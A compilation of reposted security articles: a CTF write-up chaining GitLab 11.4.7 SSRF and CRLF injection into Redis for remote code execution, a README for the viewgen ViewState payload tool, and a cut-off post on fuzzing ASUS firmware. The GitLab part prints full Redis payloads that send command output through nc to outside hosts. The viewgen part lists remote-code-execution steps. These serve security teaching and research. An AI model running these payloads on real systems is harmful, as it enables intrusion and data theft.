    "You might need a 0day"

    there was a link to the challenge, and there was a download link for a docker-compose.yml file. Upon visiting the challenge site, we are greeted by a GitLab instance. The docker-compose.yml file can be used to set up a local version of this very instance. Inside the docker-compose.yml, the docker image is set to gitlab/gitlab-ce:11.4.7-ce.0. Upon doing a google search on the gitlab version, we stumbled upon a blog post on GitLab Patch Release, and it seemed like it was the latest version - the blog post was created on Nov 21, 2018 and the CTF was happening on Dec 1, 2018. So we thought we would never find an 0day in GitLab due to its huge codebase and it's just a waste of time...

    But as it turns out, we were wrong on these assumptions. During a post-CTF dinner with other teams, some people from RPISEC told us that it was not the latest version - there was a newer version 11.4.8, and the commit history of the newer version reveals several security patches. One of the bugs was an "SSRF in Webhooks" and it was reported by nyangawa of Chaitin Tech (which is also the company that organized the Real World CTF). Knowing all this, it was actually a fairly simple challenge, and I was mad because we gave up without doing enough research. So after the event, I tried to solve this challenge with the knowledge gained so far.

    Setup

    Let's start setting up a local copy of the vulnerable version of GitLab. We can start by looking at the docker-compose.yml file.

    web:
      image: 'gitlab/gitlab-ce:11.4.7-ce.0'
      restart: always
      hostname: 'gitlab.example.com'
      environment:
        GITLAB_OMNIBUS_CONFIG: |
          external_url 'http://gitlab.example.com'
          redis['bind']='127.0.0.1'
          redis['port']=6379
          gitlab_rails['initial_root_password']=File.read('/steg0_initial_root_password')
      ports:
        - '5080:80'
        - '50443:443'
        - '5022:22'
      volumes:
        - './srv/gitlab/config:/etc/gitlab'
        - './srv/gitlab/logs:/var/log/gitlab'
        - './srv/gitlab/data:/var/opt/gitlab'
        - './steg0_initial_root_password:/steg0_initial_root_password'
        - './flag:/flag:ro'
    

    From the above YAML file, the following conclusions can be made:

    • The docker image used is GitLab Community Edition 11.4.7 gitlab-ce:11.4.7-ce.0.
    • Redis server runs on port 6379 and it is listening to localhost.
    • The rails initial_root_password is set using a file called steg0_initial_root_password
    • There are some ports mapped from the docker container to our machine, which exposes the application outside the container for us to fiddle with. We'll be using the HTTP service running on port 5080.
    • Additionally, there are volumes, which mounts the local files and folders inside the docker container. For example, ./srv/gitlab/logs on our machine will be mounted to /var/log/gitlab inside the docker container. The password file and the flag is also copied into the container.

    You can create these required files and folders using the following commands:

    # Create required folders for the gitlab logs, data and configs. leave it empty
    mkdir -p ./srv/gitlab/config ./srv/gitlab/data ./srv/gitlab/logs
    
    # Create a random password using python
    python3 -c "import secrets; print(secrets.token_urlsafe(16))" > ./steg0_initial_root_password
    # ==OR==
    # Choose your own password
    echo "my_sup3r_s3cr3t_p455w0rd_4ef5a2e1" > ./steg0_initial_root_password
    
    # Create a test flag
    echo "RWCTF{this_is_flaglab_flag}" > ./flag
    

    Now that we have the required files and folders, we can start the docker container using the following command.

    $ docker-compose up
    

    The process of downloading the base image and building the gitlab instance might take a few minutes. After you start seeing some logs, you should be able to browse to http://127.0.0.1:5080/ for the vulnerable GitLab version.

    Now it's time to configure the chrome browser to use a proxy. You can do it manually by going to the settings and changing it there, or you can do it via the command-line which is a bit handier.

    /path/to/chrome --proxy-server="127.0.0.1:8080" --profile-directory=Proxy --proxy-bypass-list=""
    

    I had problems with the Burp Suite proxy not being able to intercept the localhost requests even with the bypass list being empty. So a quick workaround was to add an entry in the hosts file like the following.

    127.0.0.1     localhost.com
    

    Browsing to http://localhost.com:5080 now lets us access GitLab through the Burp Suite proxy. That's all for the setup!

    The Bugs

    As you already know, we thought that 11.4.7 was the latest version of GitLab at that time, but in fact, there was a newer version 11.4.8 which had many security patches in the commits. One of the bugs was related to SSRF and it even referenced to Chaitin Tech, which is the company responsible for hosting the Real World CTF. Additionally we also know that the flag file is located in the /(root of the file system), so we need an Arbitrary File Read or a Remote Code Execution vulnerability. Now let's have a look at those patches for SSRF and other potential bugs. At the top, you'll find 3 security related commits.

    Cover Image

    There's our SSRF in Webhooks, we also have an XSS, but it's rather not that interesting for us, and finally, we have a CRLF injection (Carriage-Return/Line-Feed) which is basically newline injections. If we look at the fix for the SSRF issue and scroll down a bit, you'll see that there are unit tests to confirm the fix for the issue. These tests tell us how to exploit the bug, which is exactly what we wanted. Looking at some test cases, apparently, special IPv6 addresses which have an IPv4 address embedded inside them can bypass the SSRF checks.

    # SSRF protection Bypass
    https://[0:0:0:0:0:ffff:127.0.0.1]
    

    The other issue was a CRLF vulnerability in Project hooks; scrolling down to the test cases, you can see it's merely URLs with newlines, either URL encoded or simply regular newlines. Now the question is, can these bugs help us in exploiting GitLab to get the flag? Yes, they can. By chaining these 2 bugs, we can get a Remote Code Execution. It's actually a typical security issue. Basically, an SSRF or Server Side Request Forgery is used to target the local internal Redis database, which is used extensively for different types of workers. So if you can push a malicious worker, you might end up with a Remote Code Execution vulnerability. In fact, GitLab has been exploited like this several times before, and there are many bug bounty writeups which are similar to this. I don't remember where I first came across this technique, but I believe it was @Agarri_FR who tweeted about it back in 2015, and there was also a blog post by him from 2014. I have come across it in many bug bounty writeups since, so everyone who's into web security should know about it.
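    Python's ipaddress module illustrates why the embedded-IPv4 form from the SSRF test cases slips past naive string checks while still resolving to loopback (a small demo, not GitLab's actual validation code):

    ```python
    import ipaddress

    raw = "0:0:0:0:0:ffff:127.0.0.1"   # host part of the bypass URL
    addr = ipaddress.ip_address(raw)

    # A naive blocklist comparing strings never matches...
    assert raw not in ("localhost", "127.0.0.1")

    # ...yet this is an IPv4-mapped IPv6 address for loopback.
    assert addr.version == 6
    assert addr.ipv4_mapped == ipaddress.ip_address("127.0.0.1")
    assert addr.ipv4_mapped.is_loopback
    print("bypass address maps to", addr.ipv4_mapped)
    ```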

    Exploitation

    Now onto the fun stuff, first, let's see if we can trigger an SSRF somewhere. At first, I thought about targeting the Webhooks (used to send requests to a URL whenever any events are fired in the repository) like it's mentioned here. However, when I clicked on the create a new project, I saw multiple ways to import a project and one of them was Repo by URL, which would basically fetch the repo when you specify a URL. We can import a repo over http://, https:// and git://. So to test this, we can try to import the repo using the following URL.

    http://127.0.0.1/test/somerepo.git
    
    ssrf_test_one_fail.gif

    But we'd get the error that "Import URL is blocked: Requests to localhost are not allowed".

    Now, we can try the bypass using the special IPv6 address. So if we replace the import URL to the following.

    http://[0:0:0:0:0:ffff:127.0.0.1]:1234/test/ssrf.git
    

    Before importing using this URL, we need a server to listen on port 1234 to confirm the SSRF. To do that, we can get a root shell on the docker container to install netcat and then listen on port 1234 to see if the SSRF is triggered. First, let's go ahead and list out all the running Docker containers to know which one to get a shell on.

    # get a list of running docker containers
    $ docker ps
    CONTAINER ID    IMAGE                           COMMAND    CREATED    STATUS    NAMES
    bd9daf8c07a6    gitlab/gitlab-ce:11.4.7-ce.0      ...        ...        ...      ...
    

    We just have one running, and it's the GitLab 11.4.7. We can get a shell on the container using the following command by specifying a container ID.

    $ docker exec -i -t bd9daf8c07a6 "/bin/bash"
    

    Here,

    • bd9daf8c07a6 is the container ID.
    • -i means interaction with /bin/bash.
    • -t means create tty - a pseudo terminal for the interaction.

    Now that we have the shell, we can install netcat so that we can set up a simple server to listen for incoming SSRF requests.

    root@gitlab:~ apt update && apt install -y netcat
    

    Setting up a raw TCP server is simple as the following command.

    root@gitlab:~ nc -lvp 1234
    

    Here,

    • -l is to tell netcat that we have to "listen".
    • -v is for verbose output.
    • -p is to specify the port number on which the server has to bind on.

    Now that we have our SSRF testing setup done let's make the same import request to see if we can trigger the SSRF. Additionally, Instead of specifying the URL from the web application in the browser, we can use the Burp Suite's repeater to quickly modify the HTTP request to our needs and send it away. To do this, we can modify the old "Repo by URL" request. We can update the URL to http://[0:0:0:0:0:ffff:127.0.0.1]:1234/test/ssrf.git and the name of the project to something that isn't already there and send the request.

    Import using 127.0.0.1

    As you can see from the above image, we did get the request trapped in our netcat listener, which confirms that the SSRF can reach internal services, in our case the local netcat server on port 1234. That means we can also talk to the internal Redis server running on port 6379 (specified in the docker-compose.yml).

    But what is Redis and how does GitLab use it?

    Redis is an in-memory data structure store, used as a database, cache and message broker. GitLab uses it in different ways like storing session data, caching and even background job queues. Redis uses a straightforward, plain text protocol, which means you can directly connect to Redis using netcat and start messing around.
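    The commands typed into netcat below use Redis' "inline" form; real clients normally speak the RESP wire format, which is just as simple. A minimal encoder sketch (illustrative only):

    ```python
    def resp_encode(*args):
        """Encode a Redis command as a RESP array of bulk strings."""
        out = f"*{len(args)}\r\n"
        for arg in args:
            out += f"${len(arg)}\r\n{arg}\r\n"
        return out

    # The 'set liveoverflow test' from the netcat session, RESP-encoded:
    print(repr(resp_encode("SET", "liveoverflow", "test")))
    ```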

    # quick test with redis
    root@gitlab:~ nc 127.0.0.1 6379
    
    blah
    - ERR unknown command 'blah'
    set liveoverflow test
    +OK
    asd
    - ERR unknown command 'asd'
    get liveoverflow
    $4
    test
    

    Redis is a simple ASCII text-based protocol, but HTTP is also a simple ASCII text-based protocol. Now, what would happen if we try to send the HTTP request to Redis? Would Redis execute commands? Let's try.

    # http request test with redis
    root@gitlab:~ nc 127.0.0.1 6379
    
    GET /test/ssrf.git/info/refs?service=git-upload-pack HTTP/1.1
    Host: [0:0:0:0:0:ffff:127.0.0.1]:1234
    User-Agent: git/2.18.1
    Accept: */*
    Accept-Encoding: deflate, gzip
    Pragma: no-cache
    - Err wrong number of arguments for 'get' command
    
    root@gitlab:~
    

    It gives us an error saying that there is a wrong number of arguments for the 'get' command, which makes sense because from the earlier example we know how the 'get' command in Redis works. But then we were dropped back to the shell, even though we saw earlier that Redis doesn't quit on errors, so what is actually going on? Pasting the raw HTTP protocol data line by line gives us the answer. The second line Host: [0:0:0:0:0:ffff:127.0.0.1]:1234 is responsible for Redis terminating the connection unexpectedly. This happens because SSRF to Redis is a huge issue and Redis has implemented a "fix" for it: if the string "Host:" is sent to the Redis server as a command, it knows that this is an HTTP request trying to smuggle some Redis commands and stops execution by closing the connection.

    If only we could get our payload in between the first line (GET /test...) and the second (Host: ...), we could make this work. Since we control the first line of the HTTP request, can we inject some newlines and add more commands?

    *cough* CRLF *cough*

    Yes, remember the CRLF injection bug we saw in the Security Release and the commit history, we can use that! From the commit history's test cases, we can see that the injection is pretty straight forward. By merely adding newlines or URL encoding them would do the trick for example.

    http://127.0.0.1:333/%0D%0Atest%0D%0Ablah.git
    
    # Expected to be Converted To 
    http://127.0.0.1:333/
    test
    blah.git
    

    However, this didn't work with http:// (I'm not sure why), but changing the protocol from http:// to git:// makes it work.

    # Does work :)
    git://127.0.0.1:333/%0D%0Atest%0D%0Ablah.git
    
    # Expected to be Converted To 
    git://127.0.0.1:333/
    test
    blah.git
    

    Now that we know what Redis is, where it's being used and how we can add newlines using the CRLF injection, we can move on into creating a payload for the RCE. The idea is to talk to this internal Redis server by using the SSRF vulnerability and smuggling one protocol(Redis) in another(git://) and get the Remote Code Execution.
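    The decoding step shown above can be demonstrated with urllib (this only shows the unquoting behaviour; the actual splitting happens inside GitLab's URL handling):

    ```python
    from urllib.parse import unquote

    url = "git://127.0.0.1:333/%0D%0Atest%0D%0Ablah.git"
    decoded = unquote(url)  # %0D%0A decodes to a CRLF newline

    # Each CRLF becomes a separate "line" of the smuggled protocol:
    for line in decoded.split("\r\n"):
        print(line)
    ```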

    Fortunately, @jobertabma has already figured out the payload. Let's have a look at it.

     multi
     sadd resque:gitlab:queues system_hook_push
     lpush resque:gitlab:queue:system_hook_push "{\"class\":\"GitlabShellWorker\",\"args\":[\"class_eval\",\"open(\'|whoami | nc 192.241.233.143 80\').read\"],\"retry\":3,\"queue\":\"system_hook_push\",\"jid\":\"ad52abc5641173e217eb2e52\",\"created_at\":1513714403.8122594,\"enqueued_at\":1513714403.8129568}"
     exec
    

    As you know, Redis can also be used for background job queues. These jobs are handled by Sidekiq, a background task processor for Ruby. We can look at the list of Sidekiq queues to see if there's anything that we can use.

      ...
      - [default, 1]
      - [pages, 1]
      - [system_hook_push, 1]
      - [propagate_service_template, 1]
      - [background_migration, 1]
      ...
    

    There's system_hook_push which can be used to handle the new jobs and it's the same one which is being used in the actual payload. Now to execute code/command, we need a class that would do it for us, think of this as a gadget. Fortunately, Jobert has also found the right class - gitlab_shell_worker.rb.

    class GitlabShellWorker
      include ApplicationWorker
      include Gitlab::ShellAdapter
    
      def perform(action, *arg)
        gitlab_shell.__send__(action, *arg) # rubocop:disable GitlabSecurity/PublicSend
      end
    end
    

    As you can see, this is exactly the class we've been looking for. Now this GitlabShellWorker is called with some arguments like class_eval and the actual command which needs to be executed, and in our case, it's the following.

    open('| COMMAND_TO_BE_EXECUTED').read
    

    In the actual payload, we push the queue onto system_hook_push and get the GitlabShellWorker class to run our commands.
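    The escaped JSON in the payload is tedious to write by hand; it can be generated by double-encoding instead. A sketch (the jid and timestamp values are simply copied from the payload above):

    ```python
    import json

    # Hypothetical generator for the lpush line; values reused from Jobert's payload.
    job = {
        "class": "GitlabShellWorker",
        "args": ["class_eval", "open('|cat /flag | nc 192.168.178.21 1234').read"],
        "retry": 3,
        "queue": "system_hook_push",
        "jid": "ad52abc5641173e217eb2e52",
        "created_at": 1513714403.8122594,
        "enqueued_at": 1513714403.8129568,
    }

    # json.dumps once builds the job; a second pass adds the outer quotes and
    # backslash-escaping needed to pass it as a single redis argument.
    redis_line = "lpush resque:gitlab:queue:system_hook_push " + json.dumps(json.dumps(job))
    print(redis_line)
    ```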

    Now that we have everything we need for the exploitation, we can craft the final payload and send it over. Before doing that, I need to set up a netcat listener on our main machine (192.168.178.21) to receive the flag.

    $ nc -lvp 1234
    

    The final payload looks like the following.

     multi
     sadd resque:gitlab:queues system_hook_push
     lpush resque:gitlab:queue:system_hook_push "{\"class\":\"GitlabShellWorker\",\"args\":[\"class_eval\",\"open(\'| cat /flag | nc 192.168.178.21 1234\').read\"],\"retry\":3,\"queue\":\"system_hook_push\",\"jid\":\"ad52abc5641173e217eb2e52\",\"created_at\":1513714403.8122594,\"enqueued_at\":1513714403.8129568}"
     exec
     exec
    

    Some points to note:

    • In the payload above, each redis command needs a leading whitespace on its line - no clue why.
    • cat /flag | nc 192.168.178.21 1234 - we are reading the flag and sending it over to our netcat listener.
    • An extra exec command is added so that the first one executes properly; the trailing part of the request gets concatenated onto the second one instead, keeping the important part of the payload from breaking.

    The final import URL with the payload looks like this:

    # No Encoding
    git://[0:0:0:0:0:ffff:127.0.0.1]:6379/
     multi
     sadd resque:gitlab:queues system_hook_push
     lpush resque:gitlab:queue:system_hook_push "{\"class\":\"GitlabShellWorker\",\"args\":[\"class_eval\",\"open(\'|cat /flag | nc 192.168.178.21 1234\').read\"],\"retry\":3,\"queue\":\"system_hook_push\",\"jid\":\"ad52abc5641173e217eb2e52\",\"created_at\":1513714403.8122594,\"enqueued_at\":1513714403.8129568}"
     exec
     exec
    /ssrf.git 
    
    # URL encoded
    git://[0:0:0:0:0:ffff:127.0.0.1]:6379/%0D%0A%20multi%0D%0A%20sadd%20resque%3Agitlab%3Aqueues%20system%5Fhook%5Fpush%0D%0A%20lpush%20resque%3Agitlab%3Aqueue%3Asystem%5Fhook%5Fpush%20%22%7B%5C%22class%5C%22%3A%5C%22GitlabShellWorker%5C%22%2C%5C%22args%5C%22%3A%5B%5C%22class%5Feval%5C%22%2C%5C%22open%28%5C%27%7Ccat%20%2Fflag%20%7C%20nc%20192%2E168%2E178%2E21%201234%5C%27%29%2Eread%5C%22%5D%2C%5C%22retry%5C%22%3A3%2C%5C%22queue%5C%22%3A%5C%22system%5Fhook%5Fpush%5C%22%2C%5C%22jid%5C%22%3A%5C%22ad52abc5641173e217eb2e52%5C%22%2C%5C%22created%5Fat%5C%22%3A1513714403%2E8122594%2C%5C%22enqueued%5Fat%5C%22%3A1513714403%2E8129568%7D%22%0D%0A%20exec%0D%0A%20exec%0D%0A/ssrf.git
    

    Now if you send the "Repo by URL" request with this URL, we get the flag!
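    The URL-encoded form can be produced with urllib.parse.quote rather than encoded by hand. A sketch (the escaped job JSON is elided here and stands in as a placeholder):

    ```python
    from urllib.parse import quote

    JOB_JSON = '"{...}"'  # placeholder for the escaped job JSON shown above
    redis_payload = "\r\n".join([
        "",                                      # leading CRLF after the path slash
        " multi",
        " sadd resque:gitlab:queues system_hook_push",
        " lpush resque:gitlab:queue:system_hook_push " + JOB_JSON,
        " exec",
        " exec",
        "",                                      # trailing CRLF before /ssrf.git
    ])
    url = ("git://[0:0:0:0:0:ffff:127.0.0.1]:6379/"
           + quote(redis_payload, safe="")       # safe="" encodes everything
           + "/ssrf.git")
    print(url)
    ```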

    Final SSRF

    Conclusion and Takeaways

    This was a simple challenge, and after hearing about a newer version from the RPISEC team, and after seeing one of the reported bugs was by Chaitin Tech (organizers), it was just a matter of 2-3 hours to solve this challenge.

    • Do proper research before jumping into conclusions.
    • It's all about the mindset.


    LiveOverflow


     

    Sursa: https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/

  22. viewgen

    ASP.NET ViewState Generator

    viewgen is a ViewState tool capable of generating both signed and encrypted payloads with leaked validation keys or web.config files


    Requirements: Python 3

    Installation

    pip3 install --upgrade -r requirements.txt or ./install.sh


    Usage

    $ viewgen -h
    usage: viewgen [-h] [--webconfig WEBCONFIG] [-m MODIFIER] [-c COMMAND]
                   [--decode] [--guess] [--check] [--vkey VKEY] [--valg VALG]
                   [--dkey DKEY] [--dalg DALG] [-e]
                   [payload]
    
    viewgen is a ViewState tool capable of generating both signed and encrypted
    payloads with leaked validation keys or web.config files
    
    positional arguments:
      payload               ViewState payload (base 64 encoded)
    
    optional arguments:
      -h, --help            show this help message and exit
      --webconfig WEBCONFIG
                            automatically load keys and algorithms from a
                            web.config file
      -m MODIFIER, --modifier MODIFIER
                            VIEWSTATEGENERATOR value
      -c COMMAND, --command COMMAND
                            Command to execute
      --decode              decode a ViewState payload
      --guess               guess signature and encryption mode for a given
                            payload
      --check               check if modifier and keys are correct for a given
                            payload
      --vkey VKEY           validation key
      --valg VALG           validation algorithm
      --dkey DKEY           decryption key
      --dalg DALG           decryption algorithm
      -e, --encrypted       ViewState is encrypted

    Examples

    $ viewgen --decode --check --webconfig web.config --modifier CA0B0334 "zUylqfbpWnWHwPqet3cH5Prypl94LtUPcoC7ujm9JJdLm8V7Ng4tlnGPEWUXly+CDxBWmtOit2HY314LI8ypNOJuaLdRfxUK7mGsgLDvZsMg/MXN31lcDsiAnPTYUYYcdEH27rT6taXzDWupmQjAjraDueY="
    [+] ViewState
    (('1628925133', (None, [3, (['enctype', 'multipart/form-data'], None)])), None)
    [+] Signature
    7441f6eeb4fab5a5f30d6ba99908c08eb683b9e6
    [+] Signature match
    
    $ viewgen --webconfig web.config --modifier CA0B0334 "/wEPDwUKMTYyODkyNTEzMw9kFgICAw8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YWRk"
    r4zCP5CdSo5R9XmiEXvp1LHVzX1uICmY7oW2WD/gKS/Mt/s+NKXrMpScr4Gvrji7lFdHPOttFpi2x7YbmQjEjJ2NdBMuzeKFzIuno2DenYF8yVVKx5+LL7LYmI0CVcNQ+jH8VxvzVG58NQIJ/rSr6NqNMBahrVfAyVPgdL4Eke3Bq4XWk6BYW2Bht6ykSHF9szT8tG6KUKwf+T94hFUFNIXXkURptwQJEC/5AMkFXMU0VXDa
    
    $ viewgen --guess "/wEPDwUKMTYyODkyNTEzMw9kFgICAw8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YWRkuVmqYhhtcnJl6Nfet5ERqNHMADI="
    [+] ViewState is not encrypted
    [+] Signature algorithm: SHA1
    
    $ viewgen --guess "zUylqfbpWnWHwPqet3cH5Prypl94LtUPcoC7ujm9JJdLm8V7Ng4tlnGPEWUXly+CDxBWmtOit2HY314LI8ypNOJuaLdRfxUK7mGsgLDvZsMg/MXN31lcDsiAnPTYUYYcdEH27rT6taXzDWupmQjAjraDueY="
    [!] ViewState is encrypted
    [+] Algorithm candidates:
    AES SHA1
    DES/3DES SHA1

    Achieving Remote Code Execution

    Leaking the web.config file or validation keys from ASP.NET apps results in RCE via ObjectStateFormatter deserialization if ViewStates are used.
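    The signing itself is plain HMAC. A heavily simplified sketch of the idea (illustrative assumption: a SHA1 MAC over the serialized ViewState with the 4-byte __VIEWSTATEGENERATOR modifier mixed in; ASP.NET's exact byte layout differs between versions, so do not treat this as viewgen's actual implementation):

    ```python
    import hashlib
    import hmac
    import struct

    def sign_viewstate(serialized, validation_key, modifier):
        """Illustrative only: append a SHA1 HMAC computed over the payload
        plus the 4-byte modifier (__VIEWSTATEGENERATOR) value."""
        mac = hmac.new(validation_key,
                       serialized + struct.pack("<I", modifier),
                       hashlib.sha1).digest()
        return serialized + mac

    signed = sign_viewstate(b"\xff\x01payload", b"validation-key", 0xCA0B0334)
    print(len(signed) - len(b"\xff\x01payload"))  # SHA1 MAC adds 20 bytes
    ```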

    You can use the built-in command option (ysoserial.net based) to generate a payload:

    $ viewgen --webconfig web.config -m CA0B0334 -c "ping yourdomain.tld"

    However, you can also generate it manually:

    1 - Generate a payload with ysoserial.net:

    > ysoserial.exe -o base64 -g TypeConfuseDelegate -f ObjectStateFormatter -c "ping yourdomain.tld"

    2 - Grab a modifier (__VIEWSTATEGENERATOR value) from a given endpoint of the webapp

    3 - Generate the signed/encrypted payload:

    $ viewgen --webconfig web.config --modifier MODIFIER PAYLOAD

    4 - Send a POST request with the generated ViewState to the same endpoint

    5 - Profit 🎉🎉


    Thanks


    CTF Writeups about this technique

    Talks about this technique

     

    Sursa: https://github.com/0xACB/viewgen

  23. Modern Vulnerability Research Techniques on Embedded Systems

     
     

    This guide takes a look at vetting an embedded system (An ASUS RT-AC51U) using AFL, angr, a cross compiler, and some binary instrumentation without access to the physical device. We'll go from static firmware to thousands of executions per second of fuzzing on emulated code. (Sorry no 0days in this post)

    Asus is kind enough to provide the firmware for their devices online. Their firmware is generally a root file system packed into a single file using squashfs. As shown below, binwalk can run through this file system and identify the filesystem for us.

     
    
     
    $ binwalk RT-AC51U_3.0.0.4_380_8457-g43a391a.trx
    DECIMAL HEXADECIMAL DESCRIPTION
    --------------------------------------------------------------------------------
    64 0x40 LZMA compressed data, properties: 0x6E, dictionary size: 8388608 bytes, uncompressed size: 3551984 bytes
    1174784 0x11ED00 Squashfs filesystem, little endian, version 4.0, compression:xz, size: 13158586 bytes, 1492 inodes, blocksize: 131072 bytes, created: 2019-01-09 11:06:39

    Binwalk supports carving the filesystem out of the firmware image through the -Mre flags and will put the resulting root file system into a folder titled squashfs-root

     
    
     
    $ ls
    40 _40.extracted squashfs-root
    $ ls squashfs-root/
    asus_jffs cifs2 etc_ro lib opt rom sys usr
    bin dev home mmc proc root sysroot var
    cifs1 etc jffs mnt ra_SKU sbin tmp www

     

    Motivation

    The LD_PRELOAD trick is a method of hooking symbols in a given binary so that your symbol, which the loader places before the reference to the original, gets called instead. This can be used to hook functions like malloc and free, as in the case of libraries like libdheap, to call your own code and perform logging or other instrumentation-based analysis. The general format requires compiling a small stub of C code and then running your binary like this:

     
    
     
    LD_PRELOAD=/Path/To/My/Library.so ./Run_Binary_As_Normal

    I wanted to try a trick I saw online to create a fast and effective fuzzer for network protocols. This GitHub gist shows a PoC of creating an LD_PRELOAD'ed library that intercepts libc's call to main and replaces it with our own.

     
    
     
    #define _GNU_SOURCE
    #include <stdio.h>
    #include <dlfcn.h>

    /* Trampoline for the real main() */
    static int (*main_orig)(int, char **, char **);

    /* Our fake main() that gets called by __libc_start_main() */
    int main_hook(int argc, char **argv, char **envp)
    {
        // Do my stuff
    }

    /*
     * Wrapper for __libc_start_main() that replaces the real main
     * function with our hooked version.
     */
    int __libc_start_main(int (*main)(int, char **, char **), int argc, char **argv,
                          int (*init)(int, char **, char **),
                          void (*fini)(void),
                          void (*rtld_fini)(void),
                          void *stack_end)
    {
        /* Save the real main function address */
        main_orig = main;
        /* Find the real __libc_start_main()... */
        typeof(&__libc_start_main) orig = dlsym(RTLD_NEXT, "__libc_start_main");
        /* ... and call it with our custom main function */
        return orig(main_hook, argc, argv, init, fini, rtld_fini, stack_end);
    }

    My thought was to then call a function inside of the now-loaded binary, starting from main. Any following calls or symbol lookups from the directly called function should resolve correctly because the main binary is loaded into memory!

    Defining a function prototype and then calling the function through a pointer seemed to work. I can pull a function address out of a binary and jump to it with arbitrary arguments, and the compiler ABI will place the arguments correctly at runtime to call the function:

     
    
     
    /* Our fake main() that gets called by __libc_start_main() */
    int main_hook(int argc, char **argv, char **envp)
    {
        char user_buf[512] = {"\x00"};
        read(0, user_buf, 512);
        int (*do_thing_ptr)() = (int (*)())0x401f30;
        int ret_val = (*do_thing_ptr)(user_buf, 0, 0);
        printf("Ret val %d\n", ret_val);
        return 0;
    }

    This process is very manual and slow... Let's speed it up!

     

    Setting up

    The extracted firmware executables are all little-endian MIPS and are linked against uClibc.

     
    
     
    $ file bin/busybox
    bin/busybox: ELF 32-bit LSB executable, MIPS, MIPS32 version 1 (SYSV), dynamically linked, interpreter /lib/ld-, stripped
    $ ls lib/
    ld-uClibc.so.0 libdl.so.0 libnsl.so.0 libws.so
    libcrypt.so.0 libgcc_s.so.1 libpthread.so.0 modules
    libc.so.0 libiw.so.29 librt.so.0
    libdisk.so libm.so.0 libstdc++.so.6
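
    As a sanity check before picking a toolchain, the architecture and endianness can also be read straight out of the ELF header. A minimal sketch (elf_machine is a hypothetical helper, not part of the firmware tooling; EM_MIPS is e_machine value 8):

```python
import struct

def elf_machine(path):
    # Peek at the ELF header: e_ident[EI_DATA] (byte 5) gives the
    # endianness, and the u16 at offset 18 is e_machine (8 == EM_MIPS).
    with open(path, "rb") as f:
        hdr = f.read(20)
    assert hdr[:4] == b"\x7fELF", "not an ELF file"
    endian = "little" if hdr[5] == 1 else "big"
    fmt = "<H" if hdr[5] == 1 else ">H"
    (machine,) = struct.unpack_from(fmt, hdr, 18)
    return machine, endian
```

    Running it against bin/busybox from the extracted root should agree with the file output above.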

    DockCross does not support uClibc cross compiling yet, so I needed to build my own cross compilers. Using buildroot, I created a uClibc cross compiler for my Ubuntu 18.04 machine. To save time in the future, I've posted this toolchain and a couple of others online here. This toolchain enables quick cross compiling of our LD_PRELOAD'ed libraries.

    The target is the asusdiscovery service. There has already been a CVE for it, and it proves hard to fuzz manually. The discovery service periodically sends packets out across the network, scanning for other ASUS routers. When another ASUS router sees this discovery packet, it responds with its information and the discovery service parses it.

    These response-based network services can be hard to fuzz through traditional network fuzzing tools like BooFuzz. So we're going to find where the service parses the response and fuzz that logic directly with our newfound LD_PRELOAD tricks.

    Pulling symbol information from this binary quickly reveals which function does the parsing: ParseASUSDiscoveryPackage.

     
    
     
    $ readelf -s usr/sbin/asusdiscovery
    Symbol table '.dynsym' contains 85 entries:
    Num: Value Size Type Bind Vis Ndx Name
    0: 00000000 0 NOTYPE LOCAL DEFAULT UND
    1: 0040128c 236 FUNC GLOBAL DEFAULT 10 safe_fread
    2: 00414020 0 NOTYPE GLOBAL DEFAULT 18 _fdata
    3: 00000001 0 SECTION GLOBAL DEFAULT ABS _DYNAMIC_LINKING
    4: 0041c050 0 NOTYPE GLOBAL DEFAULT ABS _gp
    ..............SNIP....................
    33: 004141b0 4 OBJECT GLOBAL DEFAULT 22 a_bEndApp
    34: 00402cec 328 FUNC GLOBAL DEFAULT 10 ParseASUSDiscoveryPackage
    35: 00403860 0 FUNC GLOBAL DEFAULT UND sprintf
    ...............SNIP.....................

    With this symbol in mind we can open the binary up in Ghidra and have the decompiler give us a rough idea of how it's working:

     
    
     
    undefined4 ParseASUSDiscoveryPackage(int iParm1)
    {
        ssize_t sVar1;
        socklen_t local_228;
        undefined4 local_224;
        undefined4 local_220;
        undefined4 local_21c;
        undefined4 local_218;
        undefined auStack532 [516];

        myAsusDiscoveryDebugPrint("----------ParseASUSDiscoveryPackage Start----------");
        if (a_bEndApp != 0) {
            myAsusDiscoveryDebugPrint("a_bEndApp = true");
            return 0;
        }
        local_228 = 0x10;
        memset(auStack532, 0, 0x200);
        sVar1 = recvfrom(iParm1, auStack532, 0x200, 0, (sockaddr *)&local_224, &local_228);
        if (0 < sVar1) {
            PROCESS_UNPACK_GET_INFO(auStack532, local_224, local_220, local_21c, local_218);
            return 1;
        }
        myAsusDiscoveryDebugPrint("recvfrom function failed");
        return 0;
    }

    The function appears to instantiate a 512-byte buffer and read from a given network file descriptor through the recvfrom function. A quick visit to recvfrom's man page reveals that the second argument to recvfrom will contain the network input, the input we can control.

     
    
     
    RECV(2) Linux Programmer's Manual RECV(2)
    NAME
    recv, recvfrom, recvmsg - receive a message from a socket
    SYNOPSIS
    #include <sys/types.h>
    #include <sys/socket.h>
    ssize_t recv(int sockfd, void *buf, size_t len, int flags);
    ssize_t recvfrom(int sockfd, void *buf, size_t len, int flags,
    struct sockaddr *src_addr, socklen_t *addrlen);

    This user input is immediately passed to the PROCESS_UNPACK_GET_INFO function. This function is responsible for parsing the user input and relaying that information to the router.

    Opening the function in Ghidra reveals a large parsing function. This looks perfect for fuzzing!

    [Screenshot: PROCESS_UNPACK_GET_INFO decompilation in Ghidra]

    The next step is interacting with the function and providing input through its first argument. The first step towards running this as an independent function is recovering the function prototype. Ghidra shows the defined function prototype below.

     
    
     
    void PROCESS_UNPACK_GET_INFO(char *pcParm1,undefined4 uParm2,in_addr iParm3)

    Using stub-builder (introduced below), you can take this information and generate the hooking stub automatically.

     

    Instrumenting asusdiscover

    Similar to the PoC of the LD_PRELOAD main hook shown above, I needed to hook the main function. For uClibc that function is __uClibc_main. Using the same trick as above, we'll define a prototype for the function we want to call, hook uClibc's main function, and then jump directly to our target function with our arguments.

    To make this process easier, I created a tool to identify function prototypes and slot them into templated C code. The current iteration of stub-builder accepts a file and a given function to instrument. The tool is imperfect: it uses radare2 to identify function prototypes (often incorrectly) and places them into the C stub.

     
    
     
    $ stub_builder -h
    usage: stub_builder [-h] --File FILE {hardcode,recover} ...
    positional arguments:
